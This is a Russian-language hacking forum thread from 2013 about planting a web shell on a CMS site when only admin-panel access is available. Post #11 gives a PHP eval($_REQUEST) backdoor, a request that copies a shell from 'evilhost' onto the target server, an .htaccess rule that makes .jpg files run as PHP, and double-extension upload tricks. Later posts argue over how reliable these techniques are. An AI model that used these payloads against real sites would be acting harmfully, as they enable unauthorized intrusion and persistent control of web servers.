HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 30.12.2013, 00:24
Take_IT
Постоянный
Регистрация: 11.03.2013
Сообщений: 354
Провел на форуме:
97570

Репутация: 267
По умолчанию

Уважаемый ТС, хочу обратить Ваше внимание на одну мелочь - Варианты есть всегда (с)

Что за движок?

можно попробовать вставить php код с бекдором:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]php

[/COLOR][COLOR="#007700"]eval([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]]);

[/
COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]@[/COLOR][/COLOR
Смотрим абсолютный путь:

Код HTML:
localhost/?e=phpinfo();
Льем шелл:

Код HTML:
yoursite.com/news/1.html?e=copy("evilhost/shell.txt","/home/yoursite/shell.php");
Это в свое время сработало на PHPShop CMS, кстати не так давно....

Это как вариант номер раз)

Вариант номер 2.1:

Можно попробовать залить вместо картинки файл shell.php.jpg , допустим обработчик переименует его в 12312312312.php.jpg - это может прокатить, при определенных конфигах сервера....

Вариант 2.2:

Также можно попробовать залить shell.jpg

Предварительно залив .htaccess следующего содержания:

Код HTML:
AddType application/x-httpd-php .jpg
Тогда сервер будет обрабатывать .jpg файлы как приложение php и переименованный шелл с новым названием 123123123123.jpg отработает как пых файл)

Вариант 2.3:

Попробуй залить файл shell.php.g1f или shell.php.ololo

файл shell.php.ololo имеет неизвестный формат, т.к. апачу не знакомо расширение .ololo он начнет обрабатывать наш шелл как PHP файл.

PS а вообще, я уверен, что это далеко не все способы которые можно попробовать заливаясь из админки...
 
Ответить с цитированием

  #12  
Старый 30.12.2013, 15:09
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

умники собрались

Тake_IT

"@php

eval($_REQUEST[e]);

php@ "

ты где встречал такие теги "@php php@" ?

если в каком то темплейт двиге оно используется как пхп тег это не значит что оно везде будет работать.

тс сказал что залить можно картинки, с чего ты взял что можно загрузить хтакцесс?

"12312312312.php.jpg - это может прокатить, при определенных конфигах сервера...."

ага, определенные конфиги, какой даун админ будет настроить сервер на обработку jpeg как php

такие методы могут сработать в конкретных двигах, но в общем случай писать о них как о методах заливки шелла это глупо.
 
Ответить с цитированием

  #13  
Старый 30.12.2013, 22:58
Take_IT
Постоянный
Регистрация: 11.03.2013
Сообщений: 354
Провел на форуме:
97570

Репутация: 267
По умолчанию

Цитата:
Сообщение от Konqi  
умники собрались
[offtop]Раньше ты попроще был)) [/offtop]

Цитата:
Сообщение от Konqi  
"@php
eval($_REQUEST[e]);
php@ "
ты где встречал такие теги "@php php@" ?
если в каком то темплейт двиге оно используется как пхп тег это не значит что оно везде будет работать.
эти теги я встречал минимум в 3 движках phpshop cms , Instant Update CMS, Blox CMS, могу еще вспомнить....

Цитата:
Сообщение от Konqi  
тс сказал что залить можно картинки, с чего ты взял что можно загрузить хтакцесс?
учитывая то, что ТС совсем зеленый, я предположил что он может не совсем правильно описывать ситуацию, в частности, с загрузкой файлов. поэтому решил напомнить про несколько несложных методов)

Цитата:
Сообщение от Konqi  
"12312312312.php.jpg - это может прокатить, при определенных конфигах сервера...."
ага, определенные конфиги, какой даун админ будет настроить сервер на обработку jpeg как php
такие методы могут сработать в конкретных двигах
, но в общем случай писать о них как о методах заливки шелла это глупо.
случаев когда файлы .php.gif запускаются - масса, на моей памяти это примерно 15-20%

в конкретных двигах говорите?) а мы знаем с каким двигом столкнулся ТС ? а вдруг это тот самый, "конкретный"??

PS мне кажется от твоего совета было бы больше проку, чем от критики)
 
Ответить с цитированием

  #14  
Старый 31.12.2013, 05:06
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

Цитата:
Сообщение от Take_IT  
[offtop]Раньше ты попроще был)) [/offtop]
а ты наверное с другого акка сидел.
PS мне кажется от твоего совета было бы больше проку, чем от критики)
я выше уже отписался, что если нету конкретной инфы о двиге, то не имеет смысла описать какие то левые методы которые работают с очень низкой частотой
 
Ответить с цитированием

  #15  
Старый 31.12.2013, 11:54
Take_IT
Постоянный
Регистрация: 11.03.2013
Сообщений: 354
Провел на форуме:
97570

Репутация: 267
По умолчанию

Цитата:
Сообщение от Konqi  
я выше уже отписался, что если нету конкретной инфы о двиге, то не имеет смысла описать какие то левые методы которые работают с очень низкой частотой
ну извините бл* )) если случаев, когда .php.gif обрабатывается как пхп 15-20% (1 из 5\6 - оказывается для тебя этого мало) , то этими способами похекалось минимум половина всех CMS которые я изучал)) а ты говоришь про низкую частоту...

PS ага, пароль потерял, давно не заходил сюда)
 
Ответить с цитированием

  #16  
Старый 31.12.2013, 14:49
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Take_IT  
ну извините бл* )) если случаев, когда .php.gif обрабатывается как пхп 15-20% (1 из 5\6 - оказывается для тебя этого мало) , то этими способами похекалось минимум половина всех CMS которые я изучал)) а ты говоришь про низкую частоту...
PS ага, пароль потерял, давно не заходил сюда)
Бред пишешь. Если " .php.gif обрабатывается как пхп 15-20%" это всего лишь означает, что эти 20% были похеканы кем-то ранее. Ни одна нормальная CMS (без бэкдоров), ни один адекватный админ (не обкуренный) не позволит выполняться картинкам как пхп-код.

Что-то прям из научной фантастики. Я согласен ещё на .ololo с натяжкой - да, встречается. Но вышепредложенное - вообще бред чистой воды.

З.Ы. А залейте вообще *.txt. Вдруг выполнится как php? Ну а вдруг?
 
Ответить с цитированием

  #17  
Старый 31.12.2013, 17:36
Take_IT
Постоянный
Регистрация: 11.03.2013
Сообщений: 354
Провел на форуме:
97570

Репутация: 267
По умолчанию

опачки! одепты подтянулись)))

Ох, ну ничего себе кто меня учить собрался))))

Цитата:
Сообщение от BigBear  
Бред пишешь. Если " .php.gif обрабатывается как пхп 15-20%" это всего лишь означает, что эти 20% были похеканы кем-то ранее. Ни одна нормальная CMS (без бэкдоров), ни один адекватный админ (не обкуренный) не позволит выполняться картинкам как пхп-код.
да я и не утверждаю что нормальный человек так настроит сервер суть не в том из за чего это работает(админ дурак или серв похекали раньше), суть в том, что это работает(фактически) и с достаточно большой вероятностью, пусть это будет даже 1 сервер из 10...

А про то, как в нормальных CMS появляются бекдоры, я расскажу немного позже) как раз снял видео на эту тему

Цитата:
Сообщение от BigBear  
Что-то прям из научной фантастики. Я согласен ещё на .ololo с натяжкой - да, встречается. Но вышепредложенное - вообще бред чистой воды.
с натяжкой?) а объясни почему это сработает не всегда и почему вообще работает?)

file.php.ololo имеет неизвестное для апача расширение .ololo поэтому он будет обрабатывать file.php.ololo точно также как и file.php. а знаешь почему?? потому, что в случае если апач встречает файл с незнакомым расширением он начинает искать знакомое расширение с конца имени файла, т.е. фактически, если бы мы залилиfile.php.txt.ololo он бы выполнился как .txt. А не сработает это в том случае, если в дире куда льем файл не выполняется пых

Зы вам че, квестики перестали делать?)) плохо, мозги как и мышцы надо тренировать))) И кстати, если для тебя вышеописанное фантастика, почитай хоть темы роа за 2009-2011 года, помнится там было много примеров)

Цитата:
Сообщение от BigBear  
З.Ы. А залейте вообще *.txt. Вдруг выполнится как php? Ну а вдруг?
троллинг не засчитан, тренируйтесь лучше на кошках (с)
 
Ответить с цитированием

  #18  
Старый 31.12.2013, 17:44
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

Цитата:
Сообщение от Take_IT  
file.php.ololo
имеет неизвестное для апача расширение .ololo поэтому он будет обрабатывать
file.php.ololo
точно также как и
file.php
 
Ответить с цитированием

  #19  
Старый 31.12.2013, 17:55
Take_IT
Постоянный
Регистрация: 11.03.2013
Сообщений: 354
Провел на форуме:
97570

Репутация: 267
По умолчанию

Цитата:
Сообщение от Konqi  

пардон, я не говорю что от этого нет никакой защиты и это работает в 100%, но ведь на локалке, в искусственных условиях, можно добиться самого разного результата и сделать что угодно)
 
Ответить с цитированием

  #20  
Старый 31.12.2013, 18:00
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Какие там требования чтоб file.php.unknown_extension выполнялся как .php напомните пожалуйста.

mod_mime enabled кажется, и что-то ещё видимо. У меня на локалке mod_mime вроде стоит, а код не выполняется.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.